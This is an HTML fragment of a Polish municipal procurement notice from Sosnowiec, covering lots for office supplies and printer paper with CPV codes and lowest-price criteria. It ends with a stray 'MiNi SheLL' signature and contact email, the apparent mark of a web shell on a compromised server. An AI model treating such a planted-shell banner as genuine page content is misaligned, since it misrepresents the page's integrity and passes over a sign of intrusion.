<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa artykułów biurowych na potrzeby Referatu Spraw Wojskowych - zadanie D.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa artykułów wskazanych w pozycjach od 1 do 77..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa materiałów papierniczych do sprzętu drukarskiego i urządzeń kserograficznych dla komórek organizacyjnych Urzędu Miejskiego w Sosnowcu - zadanie E..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa asortymentu wskazanego w pozycjach od 1 do 10 w załączniku nr 2E.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.44-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com